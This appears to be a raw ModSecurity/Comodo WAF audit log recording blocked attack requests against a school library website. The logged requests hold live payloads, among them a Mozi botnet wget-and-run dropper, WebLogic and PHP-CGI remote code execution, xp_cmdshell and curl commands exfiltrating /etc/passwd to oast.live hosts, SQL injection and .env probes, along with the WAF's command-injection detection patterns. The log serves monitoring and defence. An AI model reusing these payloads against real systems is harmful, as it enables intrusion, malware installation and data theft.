(Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --00a4b02d-Z-- --a44d936c-A-- [27/May/2025:08:25:45 +0700] aDUUmVuSH_Spa4YU2Zmq0AAAAMw 103.236.140.4 51588 103.236.140.4 8181 --a44d936c-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 84 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/132.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 152792077 --a44d936c-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --a44d936c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a44d936c-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748309145119445 2447 (- - -) Stopwatch2: 1748309145119445 2447; combined=1377, p1=348, p2=1000, p3=0, p4=0, p5=29, sr=64, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a44d936c-Z-- --b7da256d-A-- [27/May/2025:08:25:57 +0700] aDUUpVuSH_Spa4YU2Zmq1AAAANA 103.236.140.4 51616 103.236.140.4 8181 --b7da256d-B-- GET /shell?cd+/tmp;rm+-rf+*;wget+http://91.166.59.96:42412/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 91.166.59.96 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 91.166.59.96 X-Forwarded-Proto: http Connection: close User-Agent: Hello, world Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 --b7da256d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b7da256d-E-- --b7da256d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?:\\b(?:c(?:d(?:\\b[^a-zA-Z0-9_]{0,}?[\\/]|[^a-zA-Z0-9_]{0,}?\\.\\.)|hmod.{0,40}?\\+.{0,3}x|md(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:\\.exe|32)\\b))|(?:echo\\b[^a-zA-Z0-9_]{0,}?\\by{1,}|n(?:et(?:\\b[^a-zA-Z0-9_]{1,}?\\blocalgroup|\\.exe)|(?:c|map)\\.exe)|t(? ..." at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "65"] [id "211210"] [rev "8"] [msg "COMODO WAF: System Command Injection||103.236.140.4|F|2"] [data "Matched Data: cd/ found within ARGS_NAMES:cd /tmp;rm -rf *;wget http://91.166.59.96:42412/Mozi.a;chmod 777 Mozi.a;/tmp/Mozi.a jaws: cd/tmp rm -rf * wget http://91.166.59.96:42412/mozi.a chmod 777 mozi.a/tmp/mozi.a jaws"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748309157475270 2068 (- - -) Stopwatch2: 1748309157475270 2068; combined=616, p1=411, p2=176, p3=0, p4=0, p5=29, sr=73, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b7da256d-Z-- --009f465b-A-- [27/May/2025:08:44:27 +0700] aDUY-96cNBpj1JOkpQlMWgAAAE0 103.236.140.4 51758 103.236.140.4 8181 --009f465b-B-- GET /.env HTTP/1.0 Host: 103.236.140.4 X-Real-IP: 167.172.254.53 X-Forwarded-Host: 103.236.140.4 X-Forwarded-Server: 103.236.140.4 X-Forwarded-For: 167.172.254.53 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0; Keydrop.io/1.0(onlyscans.com/about); Accept: */* --009f465b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --009f465b-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748310267171866 842 (- - -) Stopwatch2: 1748310267171866 842; combined=390, p1=348, p2=0, p3=0, p4=0, p5=41, sr=124, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --009f465b-Z-- --d4b0331c-A-- [27/May/2025:08:46:13 +0700] aDUZZd6cNBpj1JOkpQlMXwAAAEo 103.236.140.4 51776 103.236.140.4 8181 --d4b0331c-B-- POST /console/css/%252e%252e%252fconsole.portal HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 1258 User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 Accept: */* Content-Type: application/x-www-form-urlencoded cmd: curl d0qa44pgpeoi1bmoheagho8gyhjmxxrx1.oast.live X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160760116 --d4b0331c-C-- _nfpb=true&_pageLabel=&handle=com.tangosol.coherence.mvel2.sh.ShellSession("weblogic.work.ExecuteThread executeThread = (weblogic.work.ExecuteThread) Thread.currentThread(); weblogic.work.WorkAdapter adapter = executeThread.getCurrentWork(); java.lang.reflect.Field field = adapter.getClass().getDeclaredField("connectionHandler"); field.setAccessible(true); Object obj = field.get(adapter); weblogic.servlet.internal.ServletRequestImpl req = (weblogic.servlet.internal.ServletRequestImpl) obj.getClass().getMethod("getServletRequest").invoke(obj); String cmd = req.getHeader("cmd"); String[] cmds = System.getProperty("os.name").toLowerCase().contains("window") ? new String[]{"cmd.exe", "/c", cmd} : new String[]{"/bin/sh", "-c", cmd}; if (cmd != null) { String result = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(cmds).getInputStream()).useDelimiter("\\A").next(); weblogic.servlet.internal.ServletResponseImpl res = (weblogic.servlet.internal.ServletResponseImpl) req.getClass().getMethod("getResponse").invoke(req); res.getServletOutputStream().writeStream(new weblogic.xml.util.StringInputStream(result)); res.getServletOutputStream().flush(); res.getWriter().write(""); }executeThread.interrupt(); "); --d4b0331c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d4b0331c-E-- --d4b0331c-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\b(?:cmd(?:\\b[^a-zA-Z0-9_]{0,}?\\/c|(?:32){0,1}\\.exe\\b)|(?:ftp|n(?:c|et|map)|rcmd|telnet|w(?:guest|sh))\\.exe\\b)" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "60"] [id "211200"] [rev "3"] [msg "COMODO WAF: System Command Access||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: cmd.exe found within ARGS:handle: com.tangosol.coherence.mvel2.sh.shellsession(weblogic.work.executethread executethread =(weblogic.work.executethread) thread.currentthread() weblogic.work.workadapter adapter = executethread.getcurrentwork() java.lang.reflect.field field = adapter.getclass().getdeclaredfield(connectionhandler) field.setaccessible(true) object obj = field.get(adapter) weblogic.servlet.internal.servletrequestimpl req =(weblogic.servlet.internal.servletrequestimpl) obj.getclas..."] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748310373397443 2308 (- - -) Stopwatch2: 1748310373397443 2308; combined=788, p1=427, p2=328, p3=0, p4=0, p5=33, sr=74, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d4b0331c-Z-- --c515b562-A-- [27/May/2025:08:46:13 +0700] aDUZZWTuEZUBy5rh0sZ83QAAABU 103.236.140.4 51778 103.236.140.4 8181 --c515b562-B-- POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 608 User-Agent: Mozilla/5.0 (ZZ; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36 Accept: */* Content-Type: multipart/form-data; boundary=------------------------ca81ac1fececda48 X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 169021452 --c515b562-C-- --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="reqid" 17457a1fe6959 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="cmd" upload --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="target" l1_Lw --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="mtime[]" 1576045135 --------------------------ca81ac1fececda48 Content-Disposition: form-data; name="upload[]"; filename="poc.txt" Content-Type: text/plain poc-test --------------------------ca81ac1fececda48-- --c515b562-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c515b562-E-- --c515b562-H-- Message: Access denied with code 403 (phase 2). Pattern match "\\/lib\\/php\\/connector\\.minimal\\.php$" at REQUEST_FILENAME. [file "/usr/local/apache/modsecurity-cwaf/rules/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||perpustakaan.smkn22jakarta.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748310373397763 4213 (- - -) Stopwatch2: 1748310373397763 4213; combined=2791, p1=379, p2=2386, p3=0, p4=0, p5=26, sr=66, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c515b562-Z-- --2c71206f-A-- [27/May/2025:08:46:13 +0700] aDUZZd6cNBpj1JOkpQlMYAAAAFU 103.236.140.4 51788 103.236.140.4 8181 --2c71206f-B-- POST /mifs/.;/services/LogService HTTP/1.0 Referer: https://perpustakaan.smkn22jakarta.sch.id Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 6 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36 Content-Type: x-application/hessian X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 162463834 --2c71206f-C-- cH --2c71206f-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --2c71206f-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=x-application/hessian"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748310373414500 3054 (- - -) Stopwatch2: 1748310373414500 3054; combined=2001, p1=396, p2=1531, p3=20, p4=30, p5=23, sr=64, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2c71206f-Z-- --8f29f305-A-- [27/May/2025:08:46:14 +0700] aDUZZhLFq2VRfSzm6b8PxwAAAI4 103.236.140.4 51802 103.236.140.4 8181 --8f29f305-B-- POST /ajax/render/widget_tabbedcontainer_tab_panel HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 140 User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:124.0) Gecko/20100101 Firefox/124.0 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 169021458 --8f29f305-C-- subWidgets[0][template]=widget_php&subWidgets[0][config][code]=echo shell_exec('cat ../../../../../../../../../../../../etc/passwd'); exit;" --8f29f305-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --8f29f305-E-- --8f29f305-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /ajax/render/widget_tabbedcontainer_tab_panel"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748310374392515 1814 (- - -) Stopwatch2: 1748310374392515 1814; combined=561, p1=364, p2=169, p3=0, p4=0, p5=28, sr=65, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8f29f305-Z-- --a64b1c5e-A-- [27/May/2025:08:46:18 +0700] aDUZat6cNBpj1JOkpQlMbAAAAEk 103.236.140.4 51844 103.236.140.4 8181 --a64b1c5e-B-- POST /wp-content/plugins/wp-automatic/inc/csv.php HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 84 User-Agent: Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Safari/103.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 162463843 --a64b1c5e-C-- q=SELECT IF(1=1,sleep(15),sleep(0));&auth=%00&integ=512f993fd8e9d08f42e736f28675ed6f --a64b1c5e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a64b1c5e-H-- Message: Access denied with code 403 (phase 2). Found 1 byte(s) in ARGS:auth outside range: 1-255. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "95"] [id "210410"] [rev "4"] [msg "COMODO WAF: Invalid character in request||perpustakaan.smkn22jakarta.sch.id|F|3"] [data "ARGS:auth=\x00"] [severity "ERROR"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748310378099254 2603 (- - -) Stopwatch2: 1748310378099254 2603; combined=1426, p1=344, p2=1053, p3=0, p4=0, p5=29, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a64b1c5e-Z-- --86e53a65-A-- [27/May/2025:08:46:18 +0700] aDUZahLFq2VRfSzm6b8PyAAAAJE 103.236.140.4 51860 103.236.140.4 8181 --86e53a65-B-- POST /WSStatusEvents/EventHandler.asmx HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 775 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3.1 Safari/605.1.15 Content-Type: application/soap+xml X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 160760128 --86e53a65-C-- string GoodApp=1|md5='; EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'nslookup d0q9cd1gpeook7mlf7sgaaixium4upehw.oast.live'-- --86e53a65-F-- HTTP/1.1 404 Not Found X-Frame-Options: SAMEORIGIN Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 --86e53a65-H-- Message: Warning. Match of "pmFromFile userdata_wl_content_type" against "TX:0" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "17"] [id "210710"] [rev "5"] [msg "COMODO WAF: Request content type is not allowed by policy. Please update file userdata_wl_content_type.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "TX:0=application/soap+xml"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Stopwatch: 1748310378115319 3488 (- - -) Stopwatch2: 1748310378115319 3488; combined=2330, p1=467, p2=1786, p3=23, p4=26, p5=27, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --86e53a65-Z-- --a0d9cc1c-A-- [27/May/2025:08:55:24 +0700] aDUbjFuSH_Spa4YU2ZmrDgAAAMw 103.236.140.4 52018 103.236.140.4 8181 --a0d9cc1c-B-- GET /.env HTTP/1.0 Host: archiexnz.chickenkiller.com X-Real-IP: 209.38.248.17 X-Forwarded-Host: archiexnz.chickenkiller.com X-Forwarded-Server: archiexnz.chickenkiller.com X-Forwarded-For: 209.38.248.17 X-Forwarded-Proto: https Connection: close User-Agent: Go-http-client/1.1 --a0d9cc1c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --a0d9cc1c-H-- Message: Access denied with code 403 (phase 1). Matched phrase "/.env" at REQUEST_URI. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "117"] [id "210492"] [rev "3"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 1) Stopwatch: 1748310924552553 829 (- - -) Stopwatch2: 1748310924552553 829; combined=338, p1=298, p2=0, p3=0, p4=0, p5=39, sr=79, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --a0d9cc1c-Z-- --ad2cdd42-A-- [27/May/2025:09:08:43 +0700] aDUeq1uSH_Spa4YU2ZmrGQAAANc 103.236.140.4 52142 103.236.140.4 8181 --ad2cdd42-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly:core%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Ez=new%20Packages.java.io.File(%22%22).getAbsolutePath();z=z.substring(0,z.lastIndexOf(%22/%22));u=new%20SecurelyAccess(z.concat(%22/co..nf/glide.db.properties%22)).getBufferedReader();s=%22%22;while((q=u.readLine())!==null)s=s.concat(q,%22%5Cn%22);gs.addErrorMessage(s);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 168677378 --ad2cdd42-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --ad2cdd42-E-- --ad2cdd42-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748311723114015 2708 (- - -) Stopwatch2: 1748311723114015 2708; combined=1438, p1=471, p2=933, p3=0, p4=0, p5=34, sr=139, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ad2cdd42-Z-- --e7c7870d-A-- [27/May/2025:09:08:44 +0700] aDUerGTuEZUBy5rh0sZ85QAAABA 103.236.140.4 52156 103.236.140.4 8181 --e7c7870d-B-- GET /login.do?jvar_page_title=%3Cstyle%3E%3Cj:jelly%20xmlns:j=%22jelly%22%20xmlns:g=%27glide%27%3E%3Cg:evaluate%3Egs.addErrorMessage(1337*1337);%3C/g:evaluate%3E%3C/j:jelly%3E%3C/style%3E HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (SS; Linux x86_64; rv:132.0) Gecko/20100101 Firefox/132.0 Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 163545884 --e7c7870d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e7c7870d-E-- --e7c7870d-H-- Message: Access denied with code 403 (phase 2). Pattern match "(?i:.{0,399}?(?:@[i\\\\]|(?:[:=]|&#x?0*(?:58|3A|61|3D);?).{0,399}?(?:[(\\\\]|&#x?0*(?:40|28|92|5C);?)))" at MATCHED_VAR. [file "/usr/local/apache/modsecurity-cwaf/rules/07_XSS_XSS.conf"] [line "95"] [id "212880"] [rev "4"] [msg "COMODO WAF: IE XSS Filters - Attack Detected.||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: 206.82.6.62 found within MATCHED_VAR: "] [severity "CRITICAL"] [tag "CWAF"] [tag "XSS"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748311724131050 2328 (- - -) Stopwatch2: 1748311724131050 2328; combined=904, p1=359, p2=518, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e7c7870d-Z-- --6da35e51-A-- [27/May/2025:09:08:45 +0700] aDUerWTuEZUBy5rh0sZ85gAAAA4 103.236.140.4 52156 103.236.140.4 8181 --6da35e51-B-- POST /v1/api HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 194 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 15_3_2) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/18.3 Safari/605.1.15 Content-Type: application/x-www-form-urlencoded X-Forwarded-For: 206.82.6.62, 103.236.140.4 Cookie: X-Varnish: 168392396 --6da35e51-C-- action=list_flightpath_destination_instances&CID=anything_goes_here&account_name=1®ion=1&vpc_id_name=1&cloud_type=1|$(curl+-X+POST+-d+@/etc/passwd+d0q9cd1gpeook7mlf7sgxqx6hicpan9rb.oast.live) --6da35e51-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6da35e51-E-- --6da35e51-H-- Message: Access denied with code 403 (phase 2). Match of "contains cpanel" against "REQUEST_URI" required. [file "/usr/local/apache/modsecurity-cwaf/rules/02_Global_Generic.conf"] [line "55"] [id "211190"] [rev "9"] [msg "COMODO WAF: Remote File Access Attempt||perpustakaan.smkn22jakarta.sch.id|F|2"] [data "Matched Data: /etc/ found within REQUEST_URI: /v1/api"] [severity "CRITICAL"] [tag "CWAF"] [tag "Generic"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1748311725113635 1633 (- - -) Stopwatch2: 1748311725113635 1633; combined=583, p1=350, p2=203, p3=0, p4=0, p5=30, sr=67, sw=0, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6da35e51-Z-- --d9818815-A-- [27/May/2025:09:15:48 +0700] aDUgVN6cNBpj1JOkpQlMsQAAAFU 103.236.140.4 52296 103.236.140.4 8181 --d9818815-B-- POST /php-cgi/php-cgi.exe?%ADd+cgi.force_redirect%3d0+%ADd+cgi.redirect_status_env+%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.0 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https Content-Length: 37 User-Agent: Mozilla/5.0 (Ubuntu; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: */* Accept-Language: en X-Forwarded-For: 206.82.6.62 Cookie: X-Varnish: 168392444 --d9818815-C-- --d9818815-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d9818815-E-- --d9818815-H-- Message: Access denied with code 403 (phase 2). Pattern match 